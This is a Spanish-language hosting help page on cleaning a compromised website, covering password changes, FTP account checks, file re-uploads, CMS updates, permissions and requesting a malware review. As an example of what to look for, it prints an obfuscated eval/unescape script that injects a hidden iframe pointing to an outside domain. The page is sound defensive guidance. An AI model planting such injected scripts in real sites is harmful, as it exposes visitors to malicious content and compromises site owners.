Volver a la página principal Volver al menu de ayuda
«
»

Sitios web vulnerables


Si al ingresar a tu sitio web aparece un cartel como el que se indica debajo, significa que el mismo ha sido vulnerado y está siendo utilizado sin tu consentimiento para realizar envíos de spam o phishing.

El factor que determina la posibilidad de intrusión en tu sitio está relacionado con la vulnerabilidad del mismo, la cual depende del diseño, programación, scripts y actualización de aplicaciones instaladas.

Ante un ataque, es recomendable que adoptes las sigientes medidas para aumentar la seguridad de tu sitio:

….1. Modificar la contraseña de tu cPanel y de cualquier cuenta FTP adicional que tengas creada, por una contraseña segura.
….2. Revisar en tu cPanel que no existan cuentas FTP adicionales que vos no hayas creado.
….3. Es conveniente también cambiar las contraseñas de los usuarios MySQL del sitio.
….4. Subir nuevamente todos los archivos de tu sitio, para evitar que queden archivos o directorios sospechosos.
….5. Si utilizás algún sitio prearmado como WordPress, Joomla, foros como vBulletin, etc., es recomendable que lo actualices en lo posible a la última versión.
….6. Verificá que los permisos de directorios sean 755 y 644 para archivos.
….7. Revisar que al final de los archivos no haya ningun <script> que no sea tuyo. En una página infectada por lo general aparece algo así:

<script>eval(unescape(‘%64%6F%63%75%6D%65%6E%74%
2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73
%72%63%3D%22%68%74%74%70%3A%2F%2F%63%64%65%76%62%
2E%63%6F%6D%2F%22%20%77%69%64%74%68%3D%31%20%68%65
%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%
27%29′));</script>

….8. Una vez que el sitio esté limpio deberías solicitar la revisión del mismo desde AQUÍ para eliminar el aviso de software malintencionado.

Luego hay que esperar que el sitio sea revisado.

Te recomendamos asignar contraseñas seguras a tus cuentas de FTP, cPanel, Webmail y MySQL. En lo posible, deben contener letras, números y algún caracter especial. También deberías tener en cuenta NO utilizar para tu sitio las mismas contraseñas que en tu Facebook, mails externos, foros, etc.